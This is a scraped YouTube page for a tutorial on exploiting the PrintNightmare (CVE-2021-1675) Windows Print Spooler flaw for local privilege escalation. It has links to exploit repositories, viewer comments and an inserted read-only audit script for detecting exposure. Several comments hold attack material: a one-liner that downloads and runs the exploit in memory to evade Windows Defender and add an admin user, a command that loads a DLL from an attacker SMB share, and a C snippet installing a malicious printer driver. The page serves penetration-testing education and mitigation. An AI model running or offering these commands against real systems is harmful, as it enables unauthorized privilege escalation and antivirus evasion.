Abusing PrintNightmare (CVE-2021-1675) - Local Privilege Escalation
- Published 26 Jun 2024
- The exploit abuses the Print Spooler in Windows to load malicious DLL files. This video shows how this exploit is being used as a local privilege escalation, along with how to mitigate against these attacks. Check out the next video to see how this same vulnerability can be used for Remote Code Execution against a Domain Controller.
Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.
Please consider sharing with a friend, hitting the like button, and subscribing!
Github Resources mentioned in this video:
github.com/calebstewart/CVE-2...
github.com/cube0x0/CVE-2021-1675
Part Two:
• Abusing PrintNightmare...
👇 SUBSCRIBE TO INFINITELOGINS UA-cam CHANNEL NOW 👇
ua-cam.com/users/infinitelog...
00:00 - Intro
00:50 - Exploits on Github
02:50 - Reviewing Environment
05:40 - Running Exploit
10:00 - Mitigation
___________________________________________
Social Media:
Website: infinitelogins.com/
Twitter: / infinitelogins
Twitch: / infinitelogins
___________________________________________
Donations and Support:
Like my content? Please consider supporting me on Patreon:
/ infinitelogins
Purchase a VPN Using my Affiliate Link
www.privateinternetaccess.com...
___________________________________________
#CVE #PrintNightmare #WindowsVulnerability
Part 2, showing Remote Code Execution against a Domain Controller, will be available today at 2 PM PDT - check the link in the description!
Best explanation so far
Glad you liked it
Nice explanation. Can the next video be about Kerberos delegations?
Noted
One thing I would like to see on your channel is AV evasion and stuff like that. Anyway, it's great to watch your videos.
Thanks! AV evasion is a tough one since it changes so much - and definitely not my strong suit. I'll share it as soon as I learn more about it!
@InfiniteLogins Yeah sure, thanks for looking into it. Hoping to see it soon
cool
When you run the script, do you have the "Point and Print" GPO enabled? Thank you
Not sure, it's a mostly default config.
Hi mate, I've been trying to do this for a uni assignment, and I have been getting some errors trying this on Windows 7. Could you please recommend a link or method to get an ISO for a Win10 virtual machine like yours, and also any setup or adjustments that need to be made? Thank you heaps
This isn't going to have any problems with UA-cam censorship =p.
Thanks for the videos tho, been searching around for the powershell script for this
Shouldn't. Nothing malicious about this and I have others on the channel just like it.
🤞
When I tried to connect with user victim and password victim, it worked. However, when I tried to connect with a user that doesn't use a password, it didn't work. The command used:
Python3 CVE........ domain/user:@ip victim '\\ipattacker\smb\*.dll
..... Now, I can't connect if the victim doesn't have a password.
Note - copying and pasting the actual script and writing it to disk will get picked up by AV (Windows Defender), so keep it in memory and do this instead so that it doesn't get picked up:
iex(iwr raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -UseBasicParsing); Invoke-Nightmare -NewUser "User1" -NewPassword "password123" -DriverName "PrintMe"
:) Hope that helps
Put this here because I was testing it along with the video and noticed Defender didn't like that lol ;)
Thanks!
@InfiniteLogins npnp!
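Both the "Point and Print" GPO question above and the in-memory PowerShell note come down to the same thing for a defender: whether this host lets a non-administrator install a printer driver through the Spooler, and whether a driver was recently added. The following audit script is an added example, not code from the video or from either linked repository. The registry value names are the ones from Microsoft's published CVE-2021-34527 guidance; the PrintService event IDs (316 for a driver added or updated, 808 for a plug-in module the spooler failed to load) and the 7-day window are my own assumptions, and that operational log is disabled by default, so enable it before relying on step 4.

```powershell
# Added audit example (not from the page): report a host's exposure to
# PrintNightmare-style driver installation. Run from an elevated session.

$ErrorActionPreference = 'SilentlyContinue'
$findings = @()

# 1. Is the Print Spooler running? Hosts that never print (domain controllers
#    in particular) can simply have the service disabled.
$spooler = Get-Service -Name Spooler
if ($spooler -and $spooler.Status -eq 'Running') {
    $findings += "Spooler service is running (StartType: $($spooler.StartType))"
}

# 2. Point and Print policy values. Each entry: expected hardened value.
#    NoWarningNoElevationOnInstall = 1 or UpdatePromptSettings != 0 let drivers
#    install silently; RestrictDriverInstallationToAdministrators = 0 lets
#    non-admins install them (default became 1 with the August 2021 update).
$pnpKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$pnp = Get-ItemProperty -Path $pnpKey
$expected = @{
    NoWarningNoElevationOnInstall              = 0
    UpdatePromptSettings                       = 0
    RestrictDriverInstallationToAdministrators = 1
}
foreach ($name in $expected.Keys) {
    $actual = if ($null -ne $pnp) { $pnp.$name } else { $null }
    if ($null -eq $actual) {
        $findings += "$name not set (relying on the OS default)"
    } elseif ($actual -ne $expected[$name]) {
        $findings += "$name = $actual (hardened value is $($expected[$name]))"
    }
}

# 3. Installed printer drivers. A name you do not recognise, or data/config
#    files outside the driver store, deserves a closer look.
Write-Host "Installed printer drivers:"
Get-PrinterDriver |
    Select-Object Name, DriverVersion, Manufacturer, DataFile, ConfigFile |
    Format-Table -AutoSize

# 4. Recent driver-installation events (assumed IDs, see lead-in).
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PrintService/Operational'
    Id        = 316, 808
    StartTime = (Get-Date).AddDays(-7)
}
foreach ($e in $events) {
    $findings += "PrintService event $($e.Id) at $($e.TimeCreated): $($e.Message -replace '\s+', ' ')"
}

Write-Host ""
if ($findings.Count -eq 0) {
    Write-Host "No findings: spooler stopped or Point and Print hardened, no recent driver events."
} else {
    Write-Host "Findings:"
    $findings | ForEach-Object { Write-Host " - $_" }
}
```

The script only reads service state, registry values, the driver list and the event log; it changes nothing. Where it reports the Spooler running with `RestrictDriverInstallationToAdministrators` set to 0 or `NoWarningNoElevationOnInstall` set to 1, the host is in the configuration the video's mitigation segment is about, and the fix is to apply the GPO values above (or stop the service) rather than to edit the registry by hand on each machine.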
Is this really your typing speed? How many words per minute are you typing? LOL
Haha, that's me!
While PS seems like a good idea, avoiding Linux, you'd be leaving footprints with PS history ... this doesn't seem ideal to me ...
Everyone says it works on all versions of Windows, BUT IT DOESN'T WORK ON WINDOWS 7!
This:
DRIVER_INFO_2W di = {};
di.cVersion = 3;
di.pName = (LPWSTR)L"1111";
di.pEnvironment = (LPWSTR)L"Windows x64";
di.pDataFile = (LPWSTR)DLL_PATH;
di.pConfigFile = (LPWSTR)DLL_PATH;
di.pDriverPath = (LPWSTR)L"C:\\Test\\UNIDRV.DLL";
AddPrinterDriverExW(0, 2, (PBYTE)&di, 0);
This gives error 5 on Win7; on Win10 before 21H2 it works.